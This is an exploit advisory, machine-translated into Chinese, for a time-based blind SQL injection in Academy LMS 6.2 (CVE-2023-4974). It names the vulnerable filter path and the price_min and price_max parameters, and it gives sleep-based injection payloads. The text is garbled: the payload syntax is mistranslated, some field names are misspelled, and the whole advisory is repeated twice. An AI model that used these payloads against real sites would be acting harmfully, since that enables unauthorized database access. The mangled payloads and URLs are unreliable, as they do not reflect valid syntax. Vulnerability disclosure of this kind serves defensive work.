#利用标题:学院LMS 6.2 -SQL注入
#利用作者:饼干
#日期: 29/08/2023
#vendor: CreativeItem
#供应商HomePage3360 https://creativeitem.com/
#软件link: https://demo.creativeitem.com/academy/
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4974
#CWE: CWE-89/CWE-74/CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH:/ACADEMY/TUTOR/过滤器
获取参数'Price_min'很容易受到SQL注入的影响
获取参数“ Price_max”很容易受到SQL注入的影响
https://website/Academy/tutor/filte...hed_tution_class_type%5b%5D=1price_min=[sqli] price_max=[sqli] seared_price_type%5b%5B%5D=harlysearched_duration ewnlysearched_duration e_duration duration%5b%5b%5D=0
---
参数: Price_min(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD: searched_word=searched_tution_class_type []=1price_min=(select(0)来自(select(select(sleep(7)))a)price_max=9searched_price_type []=hourlysearched_duration_duration []=0
参数: Price_max(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOLAL: searched_word=searched_tution_class_type []=1price_min=1price_max=(select(select(0)来自(select(select(sleep(9)))a)searched_price_type []=hourlysearched_duration_duration []=0
---
[-] 完毕
#利用作者:饼干
#日期: 29/08/2023
#vendor: CreativeItem
#供应商HomePage3360 https://creativeitem.com/
#软件link: https://demo.creativeitem.com/academy/
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4974
#CWE: CWE-89/CWE-74/CWE-707
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
PATH:/ACADEMY/TUTOR/过滤器
获取参数'Price_min'很容易受到SQL注入的影响
获取参数“ Price_max”很容易受到SQL注入的影响
https://website/Academy/tutor/filte...hed_tution_class_type%5b%5D=1price_min=[sqli] price_max=[sqli] seared_price_type%5b%5B%5D=harlysearched_duration ewnlysearched_duration e_duration duration%5b%5b%5D=0
---
参数: Price_min(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOAD: searched_word=searched_tution_class_type []=1price_min=(select(0)来自(select(select(sleep(7)))a)price_max=9searched_price_type []=hourlysearched_duration_duration []=0
参数: Price_max(GET)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
PAYLOLAL: searched_word=searched_tution_class_type []=1price_min=1price_max=(select(select(0)来自(select(select(sleep(9)))a)searched_price_type []=hourlysearched_duration_duration []=0
---
[-] 完毕
